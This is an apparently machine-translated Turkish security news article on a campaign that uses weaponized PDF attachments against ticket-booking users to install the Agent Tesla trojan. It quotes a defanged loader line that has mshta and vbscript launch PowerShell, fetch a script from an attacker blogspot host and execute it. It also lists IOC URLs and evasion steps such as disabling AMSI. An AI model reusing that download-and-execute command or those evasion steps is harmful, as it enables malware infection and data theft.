Tehdit aktörleri, yazılımdaki güvenlik açıklarından yararlanmak için silahlı PDF dosyalarını kullanarak hedef sistemde kötü amaçlı kod yürütmelerine olanak tanır.
PDF’ler, onları kötü amaçlı yazılım dağıtmak veya kimlik avı saldırıları başlatmak için etkili araçlar haline getiren ortak ve güvenilir bir format sağlar.
Üstelik komut dosyalarını ve multimedya öğelerini yerleştirme yetenekleri de istismar potansiyelini artırıyor.
Forcepoint’teki siber güvenlik araştırmacıları yakın zamanda bilgisayar korsanlarının silahlı PDF dosyalarını kullanarak çevrimiçi bilet rezervasyonu yapan kullanıcılara aktif olarak saldırdığını keşfetti.
Kötü amaçlı yazılım dosyasını, ağı, modülü ve kayıt defteri etkinliğini şu şekilde analiz edebilirsiniz: ANY.RUN kötü amaçlı yazılım korumalı alanıve Tehdit İstihbaratı Araması bu, işletim sistemiyle doğrudan tarayıcıdan etkileşim kurmanıza olanak tanır.
Online Bilet Rezervasyon Kullanıcılarına Saldırı
Her gün yeni kötü amaçlı yazılım sürümleri ortaya çıkıyor ve yazarlar bunu yaymak için yenilikler yapmaya devam ediyor. Bu taktikte tehdit aktörleri, kullanıcıları çeşitli hizmet sağlayıcılardan gelen eklentilerle cezbeder.
Bu yeni kampanyada, sisteme virüs bulaştırmak için bir RAT indirilmesiyle sonuçlanan bir PDF ekinin e-posta yoluyla teslim edildiği keşfedildi.
.webp)
Aşağıda yürütme zincirini sunduk: –
.webp)
Araştırmacılar PDF’leri kötü amaçlı nitelikler açısından analiz etti ve anahtar kelimeleri tarayarak statik analiz için PDFiD’yi kullandılar.
Pdf ayrıştırıcı, /ObjStm’in komut dosyalarını ve URL’leri gizlediğini ortaya çıkarır. PDF, sonraki aşamadaki yük için iki yöntem kullanırken: –
- Sahte pop-up URL işlemini tetikliyor [/URI/Type/Action/URI (hxxps://bit[.]ly/yenirezervasyongüncellemeleri)]. hxxps://bio0king adresine yönlendirir[.]blogspot[.]com/ JavaScript yükünü indirmek için.
- Doğrudan son aşama uzaktan PowerShell verisi için yerleşik vbscript ExecuteGlobal kodu veya JavaScript.
(vbscript:ExecuteGlobal\(“CreateObject\(“”WScript.Shell””\).Run””powershell -ep Bypass -c [Net.ServicePointManager]::Güvenlik Protokolü = [Net.SecurityProtocolType]::Tls12;$\(irm htloctmain25[.]blogspot[.]com//////////////atom.xml\) | . \(‘i*&*&&*x’\).replace\(‘*&*&&*’,’e’\);Uyku Başlat -Saniye 5″”,0:Kapat”\))/F ( \\..\\..\\..\\Windows\\System32\\mshta)>>”
PowerShell, karmaşık ikili gizlemeyi kullanır ve kötü amaçlı komut dosyalarını gizlemek ve yürütmek için işlevlerin yerini alır. Kayıtları değiştirir, AMSI’yi devre dışı bırakır, AV hariç tutmaları ekler ve güvenlik özelliklerini atlar.
Komut dosyası, kayıt defterini, hizmetleri ve güvenlik duvarlarını değiştirir ve ayrıca Regsvcs.exe ve MSbuild.exe gibi işlemleri de enjekte eder.
“api”ye bağlanır[.]ipify[.]Verileri çalmak ve özel bir Telegram sohbet odasına göndermek için org”. Komut dosyası ayrıca “htljan62024” adresinden ek yükler de indirir.[.]blogspot[.]Kalıcılık için com”.
İşlemlerden sonra, bir {random-name}.dll dosyasını bırakır ve çalıştırır, ardından kendi kendini siler.
Ajan Tesla kötü amaçlı yazılımı salgın sırasında hızla arttı ve gelişen taktikleri son yıllarda da devam etti. Kampanya, sahte bir seyahat acentesinden gelen kimlik avı e-postasındaki PDF’yi içeriyor.
PDF’yi açmak JavaScript’i tetikler ve gelişmiş gizleme özelliğine sahip çok aşamalı bir PowerShell betiğine yol açar.
Gizlemenin giderilmesi, Agent Tesla kötü amaçlı yazılımını yükleme tekniklerini ortaya çıkarıyor. Bu arada başarılı sızma, güvenliği ihlal edilmiş sistemlerde veri hırsızlığına ve komut yürütülmesine olanak tanır.
Truva atları, fidye yazılımları, casus yazılımlar, rootkitler, solucanlar ve sıfır gün açıklarından yararlanmalar dahil olmak üzere kötü amaçlı yazılımları engelleyebilirsiniz. Perimeter81 kötü amaçlı yazılım koruması. Hepsi son derece zararlıdır, hasara yol açabilir ve ağınıza zarar verebilir.
Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn’de takip edin & heyecan.